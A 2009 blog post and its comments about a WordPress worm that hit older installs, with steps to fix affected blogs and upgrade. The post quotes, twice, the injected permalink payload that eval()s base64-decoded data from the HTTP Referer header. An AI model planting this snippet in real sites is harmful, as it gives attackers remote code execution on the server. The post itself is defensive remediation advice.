-
HACKED! How To Fix This WordPress Worm That’s Been Going Around
10
September 8th, 2009RecommendationGrrrr.
These blogs of mine were affected by the recent wordpress worm that has been spreading across the internet ..
and this one – HART-Empire.com
What Happened?
Everybody is linking here on twitter and around the web .. so I will do that too ..
Please Read: Lorelle on WordPress – Old WordPress Versions Under Attack (Sep 4/2009)
Basically, all the permalinks from the above blogs had this attached to it:
/[old-permalink-post-title]/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
How widespread has it been? Even Scobleizer was hit!
WordPress offers some advice – but it doesn’t really offer a solution (that I can find).
HOW TO FIX YOUR BLOG IF YOU ARE AFFECTED
The best fix that I found was on Andy Sowards blog –
UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Let Me Recap: It’s not that hard to do.
1) Fix your Permalinks (settings/permalinks/update)
> You can do this in your blog .. just remove the custom permalink modification by this worm2) Check and Remove (if exists) any new Administrators – could be hidden.
> You can do this from your blog, or see via phpMyAdmin in your cPanelDo Yourself A Favor
If you haven’t been hit with this wordpress worm, upgrade to the latest wordpress version 2.8.4.
If you have been hit with this wordpress worm, upgrade to the latest wordpress version 2.8.4.
There is always good reason to keep upgrading to the latest version, and it’s all security and peace of mind. WordPress makes it so easy to upgrade now – all you have to do is push a button – so, there should be no reason why you wouldn’t want to have the latest version around.
Check These Out!
Tags: hacked, wordpress worm
HART's Super-Amazing Downsize and Expansion Plan
Currently, I have 40 Shops @ HART Market (multisites) under the domain http://HARTmarket.com. In addition to these Shops, I have embedded stores within 3 of my sites .. PetLvr Store, And You Will Store, and the Battling For Health Store. Finally, I have 5 individual domains with e-commerce ...
SMOOTH SLIDER Plugin added to HART-Empire Blog
I have added the Smooth Slider plugin to this blog. You can too .. if you go to your wordpress dashboard "Plugins" section in the sidebar, "Add New", and then search for "Smooth Slider". The smooth slider is that featured box above the title of the posts. If I think a ...
HP SimpleSave External Hard Drive - Instant Hands-Free Backup
During the Christmas holidays my Good 'ole buddy "Dell Dimension 8200" desktop died. It had a good life, since I've purchased it back in 2002 when it was a super computer .. but, now it's time to move on. I have been using my spare computer ... a ...
I Like That LINKWITHIN Related Widget
I have been switching most of my blogs away from the YARP or Wordpress Related Plugins or other related posts/pages plugins that are available to Wordpress users .. and using the LinkWithin Widget. I figured that since in the past 3 days I have recommended this widget about 5 times ...
My New Business Cards Have Arrived
I normally print my own business cards. The template is on MS Publisher and I print them on Avery Clean Edge glossy business cardthem on my G85 All-In-One printer, maybe 5 sheets at a time. I never really wanted to print more than a small handfull, because it seems like ...
Comments protected by Lucia's Linky Love.
10 Responses to “HACKED! How To Fix This WordPress Worm That’s Been Going Around”
-
greven (1 comments.)
Thanks for the info. This is the reason, as you say, that is good to keep blog software updated, and WordPress releases a lot of quick security updates, so there is no reason to not do it.
** Check out greven´s last blog .. Wallpapers of the Week
-
HART
Of all the 8 blogs affected, I didn’t see any new USER added with administrator privileges .. this is both looking at the “next number” to see if it is hidden and directly via phpMyAdmin. I did delete any ‘subscriber’ users and names that I did not recognize however.
We were out at the cottage this weekend, and on Friday the blogs were okay. Had I been online more, I probably would have seen all the tweets and warnings and upgrade before my blogs were affected – I believe that to be true. Oh well!
-
Jeffro (1 comments.)
WordPress 2.8.4 which addresses the issue was released on August 12th, long before you went on a trip to the cottage.
http://wordpress.org/development/2009/08/2-8-4-security-release/
However, I think you’ve learned your lesson. Also wanted to mention that if a blog has been compromised, the solution is to not upgrade to 2.8.4 since that won’t do any good but to just wipe out the site and start over with a fresh database, fresh administrator accounts, etc on the latest version. At least this way, you can have the peace of mind of there not being any backdoors on your installation.
** Check out Jeffro´s last blog .. WordPress Idea Roundup -
HART
Jeff .. on every blog that was affected, it wasn’t an issue that I started with e.g. 2.8.2 or 2.8.3 and didn’t upgrade to 2.8.4. latest version. When I choose to upgrade to the next version 2.8+ I keep it up to date. My understanding that even that 2.8.4 link vulnerability was a result of the 2.8.3 upgrade.
The selected blogs in question were the ones that I chose to keep at the highest 2.7+ versions – which, I thought were safe – and deliberately did NOT upgrade until certain plugins caught up in development. If I knew older version were at risk with virus or worms and saw all the warnings I would certainly have disabled my affected plugins and upgraded during the interim.
With 60′ish blogs, i don’t screw around here
PS it was 30c at the cottage, and wasn’t paying attention to the tweets.
-
Alex Sysoef (1 comments.)
Sorry to hear you got hit by that one man!
And I agree with Jeff – timely upgrades are a must.
Alex
** Check out Alex Sysoef´s last blog .. Expert WordPress Automated Blog Installer -
John | English Wilderness (2 comments.)
The Entrecard blog got hit by this one at the weekend too. Luckily I either use Blogger or create sites in HTML / CSS, so it didn’t target anything of mine.
** Check out John | English Wilderness´s last blog .. Common Blue Damselfly -
Jay Zuck (1 comments.)
I was dragging my heels on the latest wordpress update, but I had the good sense to do it sometime last week.
Boy, what a relief that I didn’t have to contend with this one. I am glad that others will be prepared with the fix you offered.
** Check out Jay Zuck´s last blog .. Jason, Where Have You Been? -
ZoopMedia (1 comments.)
Great tutorial on getting rid of those nasty worms. We’ve seen it happen to a few blogs and it can be a pain to fix.
-
Tom - home business marketing tips (1 comments.)
Thanks for the info.I always try to keep my WordPress blogs updated to the latest version, but some important plugins may not work after that because they are not compatible with the newest WP version.So it´s a little dilemma…
-Tom Lindstrom
-
Rachel Price (1 comments.)
It is also easy to backup and transfer all your websites from one server to another server if you have cPanel installed`;,
Leave a Reply
Related Posts
Check These Out!
Additional comments powered by BackType
About HART-Empire
Welcome! ...
I discuss blogging, empire and pretty much anything that affects the operation of the HART-Empire Network in this blog.. More ..
Top Commentors This Month
Madison Brown (1)The Usual Stuff
Recent Comments